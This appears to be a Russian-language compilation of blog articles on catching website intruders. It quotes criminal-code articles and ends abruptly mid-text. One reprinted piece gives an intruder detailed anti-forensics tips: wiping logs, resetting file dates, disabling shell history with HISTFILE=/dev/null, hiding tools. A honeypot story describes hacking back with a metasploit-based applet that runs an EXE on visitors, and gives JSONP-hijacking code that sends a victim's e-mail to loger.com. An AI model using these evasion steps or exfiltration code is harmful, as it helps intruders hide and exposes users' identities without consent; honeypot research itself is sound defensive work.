Как поймать хакера, или как бы веревочке ни виться. Как поймать хакера, или как бы веревочке ни виться Как поймать хакера в контакте
Здравствуйте Надежда! Вы отписались на моем блоге о том, что у Вас имеются все данные на кибер преступника, но Вы не знаете, как ими можно воспользоваться, чтобы наказать злоумышленника. Меня тоже заинтересовал это вопрос, по сему, делюсь информацией, которую по этому поводу мне удалось «выудить» из просторов нынешнего, оскверненного множеством плохих людей, в виде хакеров и мошенников, Интернета:
— Пожаловаться провайдеру Хаккера, осуществляющего атаку на Ваш сайт. Предварительно собрав все имеющиеся доказательства (скрины, логи, данные, переписку и т.д.). Вроде бы, решение провайдера о блокировке Интернета злоумышленнику, выносится через суд. Точно не знаю.
— Обратиться в правоохранительные органы, в частности, в ФСБ. В УК РФ есть соответствующие статьи:
УК РФ глава 28: Преступление в сфере компьютерной информации
Статья 272. Неправомерный доступ к компьютерной информации
1. Неправомерный доступ к охраняемой законом компьютерной информации, то есть информации на машинном носителе, в электронно-вычислительной машине (ЭВМ), системе ЭВМ или их сети, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или их сети, — наказывается штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев, либо исправительными работами на срок от шести месяцев до одного года, либо лишением свободы на срок до двух лет.
2. То же деяние, совершенное группой лиц по предварительному сговору или организованной группой либо лицом с использованием своего служебного положения, а равно имеющим доступ к ЭВМ, системе ЭВМ или их сети, — наказывается штрафом в размере от пятисот до восьмисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от пяти до восьми месяцев, либо исправительными работами на срок от одного года до двух лет, либо арестом на срок от трех до шести месяцев, либо лишением свободы на срок до пяти лет.
Статья 273. Создание, использование и распространение вредоносных программ для ЭВМ
1. Создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распространение таких программ или машинных носителей с такими программами — наказываются лишением свободы на срок до трех лет со штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев.
2. Те же деяния, повлекшие по неосторожности тяжкие последствия, —
наказываются лишением свободы на срок от трех до семи лет.
Статья 274. Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети
1. Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети лицом, имеющим доступ к ЭВМ, системе ЭВМ или их сети, повлекшее уничтожение, блокирование или модификацию охраняемой законом информации ЭВМ, если это деяние причинило существенный вред, —
наказывается лишением права занимать определенные должности или заниматься определенной деятельностью на срок до пяти лет, либо обязательными работами на срок от ста восьмидесяти до двухсот сорока часов, либо ограничением свободы на срок до двух лет.
2. То же деяние, повлекшее по неосторжности тяжкие последствия, —
наказывается лишением свободы на срок до четырех лет.
Оба метода «отмщения» подразумевают неимоверную волокиту, суды и т.д.
Молодой хакер, на счету которого было огромное количество взломанных машин, безуспешно пытался зайти на сервер международного банка. Эту систему он наконец-то взломал, потратив на нее несколько бессонных ночей. "Неужели засекли? Я же чистил логи и был предельно осторожен", - вертелось у него в голове. Внезапно его раздумья прервал тонкий писк UPS, что означало отключение электропитания. Затем раздался громкий стук в дверь, за которой стояли вооруженные работники федеральной службы. Эта история закончилась бы печально, если бы горе-хакер не... проснулся от писка своего будильника.
На самом деле, мало кто из хакеров станет взламывать банковские системы, не зная азов собственной безопасности. Админы на стратегически важных системах - люди неглупые и получают за свою работу хорошие деньги, поэтому соревноваться с ними в знаниях компьютерных технологий очень опасно.
Но ведь ломают! Ломают и удерживаются незамеченными на серверах месяцами, а то и годами. И все благодаря элементарной маскировке. Достигается она, как правило, соблюдением нескольких неписаных законов, которые знает каждый уважающий себя хакер. Нарушив одно из таких правил, можно стать уязвимым для админов, которые своевременно обнаружат и нейтрализуют найденного взломщика. При этом последствия для нарушителя могут быть весьма плачевными.
Тебе интересно, о каких нарушениях идет речь? В этом материале я кратко изложу десять ошибок хакера, которые, на мой взгляд, являются самыми популярными. Ошибки актуальны в основном для unix-like систем, поэтому любителей Windows попрошу не питать особых надежд.
1. Чистка логов
Как ни странно, мало кто любит чистить логи во взломанной системе. А ведь именно по логам админ обнаруживает вторжение. Давай рассмотрим механизм создания логов в unix-like операционке.
Как правило, служебная информация скидывается в файл при помощи функции syslog(). Эта функция напрямую работает с демоном syslogd, либо с его альтернативой (syslog-ng, например). У этого демона есть свой конфигурационный файл (по умолчанию /etc/syslog.conf), в котором подробно указывается местонахождение log-файлов и критерии для того или иного лога, чтобы корректно отделить мух от котлет. Хакер часто забывает, что админ может сменить названия дефолтовых журналов, перенаправив /var/log/secure, к примеру, в /usr/admin/secure. К тому же логи могут писаться в консоль конкретному юзеру, что сильно затрудняет положение хакера.
Чистка таких файлов должна осуществляться с особой осторожностью: проверенными логвайперами, либо руками (идеальный вариант). Я лично встречал такие логвайперы, после применения которых журналирование данных останавливалось. Думаю, добропорядочный админ при таком раскладе быстро заметит неполадки в системе.
Как ни странно, руками вычистить текстовые логи очень просто. Вначале
необходимо узнать, есть ли в логах данные, которые следует убрать
(например, ip хакера или логин в системе). Затем эта информация
старательно вычищается из отдельно взятого журнала с последующим
перенаправлением во временный файл. И лишь после этого временный файл
переименовывается в настоящий. Эти операции осуществляются при помощи
стандартных команд grep и mv. Их можно также провести и при помощи
внешних редакторов (vi, ee, mc).
Если с чисткой текстовых логов не возникает особого геморроя, то
обрабатывать бинарные файлы несколько сложнее. Тут не обойтись без
специальных логвайперов, понимающих структуру следующих файлов:
/var/log/wtmp, /var/log/lastlog и /var/run/utmp.
Часто хакеры решают проблему простой командой rm. Но если админ увидит, что за последний месяц в его системе не было пользователей, взломщику от этого лучше не станет. Удалять можно лишь utmp-файл, отображающий пользователей в системе в данный момент времени. После удаления должна последовать команда touch, создающая файл заново. Если этого не сделать, бинарник /usr/bin/w ругнется на отсутствие utmp, а запись онлайн юзеров производиться не будет.
2. Изменение даты на файлах
Дата на файлах - уязвимое место хакера. Именно по дате программы-следилки за системой определяют установку руткита, либо изменение системных файлов. Сменить дату на файле позволяет команда touch с параметром -t, после которого идет дата в формате: МесяцДеньЧасМинутаГод. Взломщики очень часто забывают менять дату обратно на старую после правки конфа либо перезаписи бинарника. Админские утилиты быстро определяют изменения в системе и посылают подробный отчет администратору на мыло.
3. История команд
Незаменимый атрибут любого шелла - хранение истории команд, набранных пользователем. Это сделано, чтобы иметь возможность повтора набранной когда-то команды. Файл с историей команд в первую очередь изучается хакером при удачном взломе системы, чтобы получить первоначальную информацию о деятельности админа, либо вытянуть пароли из консольных программ.
Но если посмотреть с другой стороны, то и админ может быть параноиком, регулярно изучающим свой собственный history-файл. И если хакер порядочно наследил в системе, оставив таким образом историю установки руткитов или DoS"еров, реакция администратора непредсказуема. Поэтому каждый взломщик должен своевременно заметать свои следы.
Местонахождение history-файла можно узнать через переменную среды HISTFILE, просмотрев ее консольной командой echo $HISTFILE. Соответственно после команды export HISTFILE=/dev/null запись команд в файл прекратится. Внимание! Данный прием работает только на время текущей сессии, поэтому хакеру придется выполнять команду каждый раз при появлении в системе.
4. Заражение системы руткитами
Как это ни парадоксально, но установка руткитов может запросто выдать хакера. Во-первых, заменяя системные файлы, он, как правило, совершает ошибку №2, так как устанавливать первоначальную дату на туеву хучу бинарников мягко говоря долго и неспортивно. Во-вторых, если админ установил новую версию пакета (binutils, например), то установка старой поверх системной ни к чему хорошему не приведет. Более того, нарушителя могут выдать ключи к командам, задаваемые alias"ом. К примеру, старая версия /bin/ls не понимает ключа --colors, а многие руткиты содержат именно старые версии. Иными словами, установив старый руткит на новую систему, хакер автоматически подписывает себе смертный приговор.
5. Установка своего софта
Взломав систему, нарушитель нередко ставит на нее свой софт, к примеру, socks или nmap, что вполне логично - ему была необходима подопытная система, и он ее получил. Но даже если процессы взломщика скрываются, то в этом случае админ может обнаружить открытый 1080-ый порт в системе. Тогда он быстро догадается, в чем дело, и тем самым раскроет маскировку хакера.
На самом деле, после взлома нарушитель анализирует деятельность админа и делает выводы о степени запущенности сервера. Но устанавливать свои программы в корневые директории все же не стоит. Чтобы этого избежать, хакер должен создать свой отдельный скрытый каталог и ставить весь боевой софт в него. Это достигается командой./configure --prefix=/path/to/hidden/xakep_dir при установке пакетов.
6. Сканирование со взломанной системы
Самая распространенная ошибка среди всех перечисленных. Ведь скан с порутанного сервера никогда не приводит ни к чему хорошему. Смотри сам: взломщик сканирует подсеть nmap"ом или другим доступным сканером. После чего законопослушный админ просканенной сетки может написать жалобу в abuse компании, с которой производился скан, с высылкой всех логов, доказывающих факт вторжения. Служба безопасности, закрепленная за компанией, в свою очередь приходит к выводу, что их сервер поломали, и стучат по голове администратору. Ясно, что после этого инцидента хакеру на сервере не жить.
Конечно, эта ситуация далеко не типична. Из-за инертности наших доблестных админов сканирование часто сходит хакеру с рук. Но имей в виду, что он может нажить себе лишние проблемы, ведя активную деятельность со взломанного сервера.
7. Изменение рулесов фаервола
Фаервол - личное дело админа. И если он его установил, подразумевается, что он знает все его правила как свои пять пальцев. Если же взломщик будет их настраивать на свой вкус, то рано или поздно админ пресечет эти деяния. Исключение могут составлять жуткие нагромождения правил, составленные явно не администратором системы. Добавление неприметной записи в эту гремучую смесь не вызовет катастрофы.
Если же фаервол содержит несколько удобочитаемых правил, и, судя по HISTFILE, администратор регулярно следит за ними, то ничего не остается, кроме как подчиниться им, либо изменить исходники фаервола (для C гуру). Это, кстати, самый классный вариант.
8. Добавление новых пользователей
Довольно типичная ситуация: взломав систему, хакер делится впечатлениями о взломе в IRC или ICQ. Его лучшие друзья тут же начинают выпрашивать шелл для личных нужд. Поразмыслив немного, взломщик добавляет пользователя в систему, успокаивая себя, мол, шелл-то не рутовый, чем он может мне помешать. На следующий день администратор получает утренний отчет об аномальных происшествиях в системе и находит в нем интересную строку, например:
New users:
xakep:x:31337:31337:Xakep user:/home/xakep:/bin/bash
Теперь можно попрощаться с root-аккаунтом на взломанной тачке.
Чтобы такого не происходило, в системе не должно быть новых пользователей со стороны взломщика. Лучше всего проверить на прочность уже существующие учетные записи и пользоваться ими.
9. Допуск в систему посторонних лиц
Эта ошибка похожа на предыдущую, но есть одно отличие. Нередко у хакера просят доступ к серверу через его же собственные бэкдоры. После предоставления такого доступа можно сразу попрощаться с сервером. Все люди разные, и постороннее лицо может легко нарушить все вышеописанные правила за один сеанс работы, тем самым нарушив твою маскировку в системе.
Грамотный хакер никогда не создает подобных ситуаций. Более того, он не треплется о взломе где попало, всегда ставя собственную безопасность на первое место. Нарушение данного правила возможно лишь в случае, если ты убежден, что после предоставления доступа у тебя не возникнет лишних проблем.
10. Выбор профессии хакера
Да, ты не ослышался! Хакер - как сапер, первый раз ошибается еще при выборе своей профессии. Каждый взлом может оказаться для него фатальным, и сам он это осознает. Но не может с этим смириться, считая взлом экстремальным видом спорта. Если ты все еще раздумываешь, "быть или не быть хакером", то я дам тебе совет. НЕТ! Быть хакером уже не так модно, да к тому же опасно. Так что займись лучше чем-нибудь другим, например, продажей школьных выпускных сочинений по русскому языку через интернет:).
Вот, собственно, и все оплошности, приводящие к печальным последствиям. Но, еще раз повторюсь, все эти ошибки актуальны лишь в системе, за штурвалом которой сидит добросовестный админ, заслуженно получающий свою зарплату. В запущенных серверах, где админ мониторит систему по пьяни и только по праздникам, можно творить что угодно - хуже все равно не будет.
Этот материал призван показать типичные случаи, когда хакеры выдают себя во взломанной системе. Не следует считать это руководством к действию. Прежде чем совершить непоправимое, прочитай еще раз 10 пункт. В мире ведь еще столько интересного:).
Утилиты-следилки или помощь админу
В этой статье не раз упоминалось про админские утилиты. Они представляют собой программы, которые ежедневно сканируют систему (md5-сумма бинарников, изменение в конфах, процессах и т.п.) и сравнивают изменения в своей базе. После чего генерируют отчет и шлют его админу на мыло. Сама прога висит в виде демона или запускается crontab"ом. Примером такой утилиты является программа tripwire.
Не раз я сталкивался с вопросами пользователей, можно ли каким либо образом вычислить хакера который взломал тот или иной сайт. Вопрос достаточно интересный и однозначного ответа на него дать невозможно. Конечно же все зависит от квалификации человека который осуществляет атаку и от его осторожности. Но как оказалось на практике, очень многие хакеры совершают достаточно глупые ошибки и раскрывают свою анонимность. Давай посмотрим как.
Прежде всего… а зачем мне это? Я не «трехбуквенник», а скромный инженер, замыслов по захвату мира у меня пока нету и прочими недобросовестными делами я не занимаюсь, так чем же мне не угодила анонимность? Ответ прост - анонимусами, хацкерами, скрипт-кидисами… Эти ребята вечно пытаются что-то там сломать, украсть, испортить или погонять свое ЧСВ. Дело это, если подумать не такое уж и плохое (лучше чем в подворотне наркотиками баловаться), но раз ребята любят поиграть - давайте поиграем с ними.
Их анонимность дело не святое, поэтому можно с ней и посражаться 8) Но как общий результат, все это работает с любым пользователем сети Интернет, просто я применил усилия исключительно против атакующих, тех кто пытается получить несанкционированный доступ и нарушить статью 272 УК РФ. Кроме того, мой опыт будет интересной иллюстрацией к теме «контратаки» на самих атакующих в автоматическом режиме без участия человека. Результат контратаки - раскрытие информации об атакующем, что, согласитесь, дело хорошее, а не плохое…
Бочонок с медомДля того, чтобы не повредить анонимности ни в чем не повинных граждан и контратаковать только «злодеев», нужно быть уверенным, что данный юзверь - взломщик. Для этого достаточно иметь систему анализа поведения посетителя с механизмом обнаружения «атакующих» действий. Короче говоря, достаточно сделать honeypot . Для этого не надо разворачивать honeyd и тд. Например для общего случая с WEB ресурсом, достаточно на продакшн сервере расположить один псевдо-рабочий скрипт, который будет изображать полезность и функциональность, но на деле будет детектировать попытки проникновения и в случае «удачной» атаки изображать, что этот взлом удался. После этого исполнять контр-атаку на этого конкретного пользователя.
Наглядный пример, создадим скрипт admin.php или /admin/ не важно, любой уважающий себя атакующий найдет этот URI за несколько секунд, это очевидный ход. В случае, если хочется повысить внимание нежелательных элементов к ловушке, можно разместить линк с главной страницы (мол админка тут), ведь главная задача, чтобы плохой парень начал атаковать первым делом хонипот, а не ковырялся в нормальных скриптах.
В скрипте псевдо-админки, ясно дело, спрашивают логин и пароль. Далее дело фантазии, можно ждать когда атакующий пробрутит перебором пароль либо сделать эмуляцию уязвимости класса SQL Injection, и тогда подойдет любой пароль класса ‘ or 1=1/* , который будет давать доступ в «админку». При этом мы можем собирать статистику - как была взломана админка, подбором или через SQLi . Ну и само собой - любой кто попал в «админку» является «плохим» парнем, и его раскрытие его анонимности не вызывает у меня проблем морали.
Собственно в 2011 я разместил такой скрипт на своем горе сайте и стал ждать… ждал я не долго, так как сайт был посвящен теме ИБ, то желающих зОхакать его превышало всякое воображение.
Очевидно, что в самом общем случае, все что мы имеем об посетителе веб сайта (и атакующем, в нашем частном случае) это лишь IP адрес, User-Agent и тд. Как я говорил, мы не CIA/FSB/MOSSAD… у нас нет или PRISM, и мы понимаем, что IP адрес (учитывая разные там Proxy серверы и TOR) - это фактически НИЧЕГО. С этим мы и имеем дело в большинстве случаев, но если разыграть один тонкий психологический момент (конкретно касающегося скрипт-кидди), то выяснится, что эти ребята не ждут подвоха! Другими словами, в теле «админки» можно сделать что угодно - повесить сплойт-пак например, и пробивать сплойтами нерадивых. Но я сыграл более «плоско», я запустил Апплет Java. Мол вы прошли аутентификацию… вот наша панель GUI на Java.
Элемент социальной инженерии - атакующий в порыве радости от успешной атаки SQLi может тупо запустить апплет. И… я удивился, но таких было достаточно (конечно потом, с течением времени процент пробива падал, так как информация о подставе быстро разошлась среди узкого круга специалистов;). Собственно апплет тупо дергал EXE файл с сервера и запускал его.
EXE файл собирал НЕ ПЕРСОНАЛЬНЫЕ данные (да да, я блюду ФЗ о ПДн…), только следующую инфу: IP локальный, traceroute из сети, имя машины, логин пользователя. Это не много, но в большинстве случаев этого достаточно чтобы обойти TOR/Proxy/VPN и даже узнать фамилию атакующего! Дополнительно, конечно, можно было бы собирать BSSID окружающих точек доступа, например, и делать съемку с веб-камеры ноута, парсить конфиг файлы с винта и тд и тп. Короче суть в том, что установив «агента контр-разведки» на ПК атакующего мы обошли многие преграды, и TOR и Proxy уже не при делах. Очевидная контр-атака.
Примечание: мой агент не имел удаленного доступа, хотя технически это можно было закодить, я не хотел бекдорить и распространять вредоносное ПО. Данный агент не был вредоносным, так как собирал сугубо техническую инфу об ПК атакующего и его сетевом окружении. Кстати, все данные передавались реверсивным DNS каналом, что улучшало успешные «отстукивания» с данными - http://www.xakep.ru/post/55661/ .
1) Министерство обороны РФ
Одни из первых, попытались применить атаку типа SQLi ребята с ВНЕШНЕГО IP Министерства обороны Российской Федерации. К моему счастью, они либо не повелись на апплет, либо у них был Linux (так как мне впадлу было добавлять кросс-платформенность). Я знаю, что там хорошие ребята и, конечно, ничего плохого они не хотели! Но надеюсь при реальных «разведывательных операциях» они используют хотя бы китайские прокси сервера 😉
2) Антивирусная компания
Этот запуск был сделан с виртуальной машины антивирусной компании. DNS сервер и tracert спалили контору 8) Примечательно что ребята не добавили агента в список вредоносного ПО! Оценили. Спасибо вам ребята!
3) Куча ребят
Просто куча разных ребят, кто-то знал о фиче и просто игрался, кто-то нет (http://habrahabr.ru/post/122107/#comment_4003842)
4) И самое интересное Хост принадлежащий РАЗВЕДКЕ одной из стран СНГ. С «обратным» проникновением.
Поначалу я решил что вот она, кибер война началась! Наш агент в результате контр-атаки оказался запущен на хосте, принадлежащем службе разведки другого гос-ва. Только учетная запись выглядела как сервисная, что наводило на мысль, что хост был скомпрометирован и использовался как посредник. Чуть позже в то же день мы получили инсталл второго «агента» из той же страны, только в этот раз не из сети правительственного учреждения, а с домашнего ПК. Имя пользователя ПК оказалось легко гуглящимся и идентифицировать человека вышло без проблем. При этом, учитывая, эти «совпадения», можно сказать что либо он работает на эту разведку, либо как-то получил доступ к правительственному хосту.
Окей, мы поняли, что простейший путь раскрытия анонимности - контратака через сплойт-паки или с элементами СИ, но это толсто и очевидно. Но была еще одна идея - сторонние сервисы, такие как веб-почта или, например, социальные сети. Можно сделать атаку более незаметной… что я и сделал 8)
Да, кроме апплета, в случае успешной атаки на меня, я узнавал e-mail атакующего, чтобы точно знать «кто виноват» (ну а что делать и так ясно..). И опять же, анонимность это не TOR/VPN/Proxy chain . Этого не достаточно! И так суть проста, если гражданин использует сервисы типа ВКонтакте, yandex, google, linkedin, twitter, facebook и тд… и при этом он на них постоянно аутентифицирован, то при наличии каких-либо уязвимостей () на этих сервисах позволят раскрыть ВАШУ анонимность. Так получилось, что на сервисах mail.ru и yandex.ru были найдены уязвимости (я о них сообщил давно, и они давно запатчены, тем нем менее я успел испытать ради моего «научного» эксперимента по практической поимке злых парней…). Уязвимость самая банальная (на обоих сервисах): JSONP Hijacking. Суть проста, есть некий сервис:
mail-service.com/ajax?callback=func
Соответственно, для эксплуатации этой бреши и раскрытия анонимности используем код:
function func(obj) { var url="http://loger.com/log.php?value="+obj["e-mail"]; $.get(url); }
function func (obj ) var url = "http://loger.com/log.php?value=" + obj [ "e-mail" ] ; $ . get (url ) ;
< script src = "http://mail-service.com/ajax?callback=func" / > |
Так что помните: можете забыть о TOR/VPN, если вы вечно носитесь по соц. сетям, даже не надо иметь , чтобы проследить кто вы и откуда, достаточно «тупых» CSRF/XSS.
Типичный атакующий:
Кстати, как еще пример такого подхода, сеть linkedin, даже не нужна уязвимость, там это реальная фича - лог тех, кто просматривал ваш профайл. То есть если на мою админку повесить тупо редирект на специальный зарегистрированный профайл linkedin:
То в итоге можем прямо в linkedin’е узнавать больше информации об атакующих:
Кстати, можно заметить, что SAMEORIGIN не помогает, так как GET запрос проходит до того, как браузер проверит ORIGIN политику, проверка происходит ПОТОМ 😉
СтатистикаВ конце немного статистики. Эксперимент длился с Q2 2011 до Q3 2012.
Всего УНИКАЛЬНЫХ атак SQLi - 484 (за ~1.2 года)
Из них успешных контр-атак (Java Applet) - 52 (за ~1.2 года)
Из них успешных контр-атак на mail.ru/yandex.ru - 16 (за 6 месяцев)
~ 17 % успеха при контр-атаках.
График зависимости:
Как видно, в начале был апплет, а «мыло» я добавил значительно позже. Пики по посещаемости связаны с анонсами ZeroNights и встреч Defcon группы. Пробив по почте фактически линейный, тогда как в случае апплетов -зависимость была линейной лишь в начале эксперимента. Это связано с обновлениями Java, антивирусы добавили апплет потом в базу вредоносного ПО (что неудивительно ибо он собран из metasploit пейлода)
P.S. Кстати, если с yandex.ru есть куда сообщать о найденных мной багах, то в случае с mail.ru я не нашел контакты, пока не познакомился с тамошним ИБшником и не слил багу ему лично…
ВыводыХоть этот блог-пост больше о том как я ловил «плохих» парней, хотя на самом деле это можно экстраполировать на вопросы анонимности в сети Интернет - уж если ИТ/ИБ специалисты и хацкеры палятся, то что говорить о нормальных людях? Вполне очевидно, что TOR/Proxy и VPN не помогают в этом вопросе. Достаточно логина в соц.сети, невнимательности и еще много чего, чтобы однозначно сопоставить посетителя веб-ресурса с реальным человеком. Будьте аккуратнее и JFYI: Как работают настоящие зло-хакИры
Обычный человек, который знает об операциях спецслужб против хакеров только из остросюжетных боевиков, наверняка думает, что подобные мероприятия – это чрезвычайно сложная штука, настоящая «война умов», в которой фатальные ошибки совершаются на уровне написания кодов.
В реальной жизни все происходит совершенно по-другому – компьютерных злоумышленников, как правило, губят лень и элементарная невнимательность.
И в качестве подтверждения своих слов, я приведу несколько случаев деанонимизации и дальнейшей поимки известных хакеров и кибер-преступников.
История о вредности простых паролейДжереми Хаммонд считался одним из самых талантливых хакеров Соединенных Штатов. На его счету значился не один взлом систем безопасности банковских структур, однако, до определенной поры все это ему сходило с рук. Правоохранители плотно начали интересоваться его персоной после того, как Джереми практически в одиночку смог проникнуть в базу данных крупной неправительственной организации, занимавшейся сбором разведывательных данных.
На его след ФБР и ЦРУ навел один из внедренных в хакерскую среду агентов, который был согласен дать свои показания против Хаммонда в суде. Впрочем, этого было мало – против компьютерного злоумышленника были необходимы железобетонные доказательства, которые можно было добыть, только проанализировав данные, хранящиеся на его компьютере.
Естественно, ПК Джереми был запаролен, однако, здесь с ним сыграла злую шутку его собственная лень – в качестве ключа доступа он использовал кличку своего собственного кота. Агенты спецслужб, естественно, знали об имени его домашнего животного и воспользовались этой информацией. В итоге Джереми Хаммонд был осужден на 10 лет.
Чтобы не повторить эту историю, всегда используйте сложные пароли, не имеющие какого-либо открытого смысла.
Ох уж эти мессенджеры…В 2011 году разразился нешуточный скандал – платежная система «Ассист» подверглась мощнейшей DDoS-атаке, в результате которой ее работа была прекращена на несколько суток. По этой причине российский «Аэрофлот», который пользовался ее услугами, понес существенные убытки. С иском об их возмещении авиационная компания обратилась в суд.
В ходе разбирательства следствию удалось выйти на человека, который стоял за организацией DDoS-атаки. Им оказался Павел Врублевский – владелец еще одной платежной системы, который с помощью такого шага хотел покончить с конкурентами. В итоге его наградой стало 2,5 года тюрьмы.
Но как правоохранители вышли на след Врублевского? Все до банального просто – в ходе планирования и осуществления своего замысла он переписывался со своими подельниками в ICQ. Этот мессенджер никогда не отличался надежной защитой, поэтому следователям не составило никакого труда получить доступ к переписке главного подозреваемого.
Поэтому используйте только надежные мессенджеры и общайтесь в сети так, будто за вами уже наблюдают.
Сегодня я расскажу немного о том, о чем обычно весьмо непросто найти конкретную и достоверную информацию. Профессионалы, могущие доступно осветить эту тему, обычно предпочитают молчать и зарабатывать деньги, представляя практические аспекты защиты информации слишком сложными для понимания простыми людьми. Как приятно разрушать мифы!
Обычно сайт взламывают либо вирусы в автоматическом режиме, либо не обделенные интеллектом жители стран ближайшего зарубежья. Последние находят неплохие по популярности сайты с дырками в системе безопасности, внедряются тем или иным способом в файловую систему, расставляют "бэкдоры" (от backdoor - задняя дверь) в виде шэл-скриптов (от shell - оболочка, сетевой аналог "Проводника" или Norton Commander), с помощью которых можно впоследствии снова внедриться на сайт и, наконец, скрытно размещают скриптик с Биржи Ссылок. Ссылки они стараются разместить так, чтобы хозяин сайта этого не заметил. После этого заготовленные места для ссылок отправляются на биржу, где продаются seo-шникам, покупающим их для раскрутки по низкочастотным запросам бездарных сайтов-пустышек, например: "термотрансферная печать", "жалюзи и солнцезащитные системы", "монтаж подвесного потолка". Почем продают? Примерно по 5 копеек за одну ссылку в день, "зарабатывая" в сумме около 40-50 руб. в день с большого и хорошо раскрученного сайта.
Как известно, спрос рождает предложение, поэтому я и недолюбливаю "seo-шников". Вместо того, чтобы написать качественную статью про "монтаж подвесного потолка", сделать уникальные фотографии процесса, сверстать красивую и логичную страницу на нормальном домене (а не expert-pаtаlok, о котором, как видимо и о всем бизнесе компании явно думали не больше нескольких минут), эти халявщики скучно скупают ссылки, не принося совершенно никакой пользы человечеству, а напротив лишь провоцируя тем самым юных хакеров заниматься глупостями с продажей ссылок и взламывать кривые сайты.
При таких масштабах заработков, естественно, глупо надеяться, что взломавший ваш сайт юный хакер сидит в соседнем доме в Москве или Питере, и его удастся поймать физически. Скорее всего, заработки подобного уровня интересуют людей из неблагополучных и довольно отдаленных от столиц регионов, где им сложно найти достойную работу. Но можно поймать хакера виртуально, определив его IP-адрес, и - главное - заодно хорошенько напугать.
Первым делом необходимо определить, какие файлы на вашем сайте хакер использует для получения доступа. Об этом в общем-то тоже не очень сложном процессе я расскажу как-нибудь в следующий раз (в этом есть сущность нашей услуги ), но в любом случае скорее всего он использует два скрипта: скрипт для управления ссылками и "бэкдор" или "шэлу". Шэла обычно маскируется под какой-нибудь системный файл, зачастую оставляется несколько ее копий в разных местах движка сайта. Естественно, хакер предполагает, что он очень хитер, и никто не догадается, как именно он проник в систему. Поэтому, как только вы удалите скрипт для управления ссылками, и он заметит это через биржу, он наверняка зайдет на ваш сайт еще хотя бы раз - проверить, нашли ли вы замаскированные им шэлы или нет, и что вообще случилось.
Этим-то и надо воспользоваться. Заменив найденную шэлу специальным php-файликом, мы определим IP-адрес обратившегося к ней клиента. Вот как он выглядит:
Дорогой друг-хакер!
Мы следим за тобой!
В биржу linkfeed.ru отправлен официальный запрос на раскрытие твоей личности. Скриншоты с сайта сняты, исходный код записан, все это наториально заверено для отправки официального запроса в правоохранительные органы и провайдеру.
Кстати:
